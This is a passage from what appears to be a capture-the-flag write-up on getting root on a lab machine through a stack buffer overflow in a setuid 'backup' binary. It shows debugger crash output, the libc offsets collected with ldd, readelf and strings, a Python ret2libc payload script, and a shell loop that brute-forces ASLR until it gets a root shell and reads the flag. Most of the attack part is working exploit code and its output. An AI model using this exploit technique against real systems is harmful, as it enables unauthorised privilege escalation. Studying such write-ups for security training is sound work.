0xffffc074â+0x0004: 0x8049ed0 â "/etc"
0xffffc078â+0x0008: 0x804d5b0 â 0xfbad2498
0xffffc07câ+0x000c: 0x8048a1b â <main+30> sub esp, 0xc
0xffffc080â+0x0010: 0x00000000
0xffffc084â+0x0014: 0x00000000
0xffffc088â+0x0018: 0x00000000
0xffffc08câ+0x001c: 0x00000000
âââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââ code:x86:32 ââââ
[!] Cannot disassemble from $PC
[!] Cannot access memory at address 0x42424242
âââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââ threads ââââ
[#0] Id 1, Name: "backup", stopped 0x42424242 in ?? (), reason: SIGSEGV
âââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââ trace ââââ
ââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââTo exploit Return to Libc, and be able to spawn a shell as root, we'll need the system address, the exit address, the /bin/bash address and the base_libc address. First, we have to get the base_libc address from the victim machine. This address changes every time we execute the binary because ASLR is enabled on the system. But, we'll pick a random one, and execute the final exploit multiple times, so when the base_libc address match, the root shell will appear. In this case is 0xf7579000.
ldd /usr/local/bin/backup
linux-gate.so.1 => (0xf7738000)
libc.so.6 => /lib32/libc.so.6 (0xf7579000)
/lib/ld-linux.so.2 (0xf7739000)We can see that the offset of the system and exit functions are 0x0003a940 and 0x0002e7b0.
readelf -s /lib32/libc.so.6 | grep -E " system@@| exit@@"
-s display the symbol table.
141: 0002e7b0 31 FUNC GLOBAL DEFAULT 13 exit@@GLIBC_2.0
1457: 0003a940 55 FUNC WEAK DEFAULT 13 system@@GLIBC_2.0Finally, we'll need the offset of the /bin/sh function, which is 0x0015900b.
strings -a -t x /lib/i386-linux-gnu/libc.so.6 | grep "/bin/sh"
-ascan the entire file.-t xprint the location of the string in base 16.
15900b /bin/shNow, that I have the function's offset and the base_lib address, I can calculate the system, exit and /bin/sh addresses by adding the offset to the base_lib address.
The final payload will be the initial 512 A characters, the system address, the exit address and the /bin/sh address. The following script will calculate all the addresses, and print the final payload.
nano /tmp/bof.py
#!/usr/bin/python
from struct import pack
junk = "A" * 512
# ret2libc -> system_addr + exit_addr + bin_sh_addr
base_libc = 0xf7579000
system_addr_off = 0x0003a940
exit_addr_off = 0x0002e7b0
bin_sh_addr_off = 0x0015900b
system_addr = pack("<I", base_libc + system_addr_off)
exit_addr = pack("<I", base_libc + exit_addr_off)
bin_sh_addr = pack("<I", base_libc + bin_sh_addr_off)
payload = junk + system_addr + exit_addr + bin_sh_addr
print(payload)Finally, if we make a loop of 1000 iterations, run the backup binary, and running the python script as the third argument of the binary, at some point, the base_libc addresses will match, and we'll get a shell as root. Then, all we have to do is reap the harvest and take the root flag.
for i in $(seq 1 1000); do backup a a01a6aa5aaf1d7729f35c8278daae30f8a988257144c003f8b12c5aec39bc508 $(python /tmp/bof.py); done
...
# whoami
root
# cat /root/root.txt
ebbdb9069c32150e8a14029e929c5839Last updated
Was this helpful?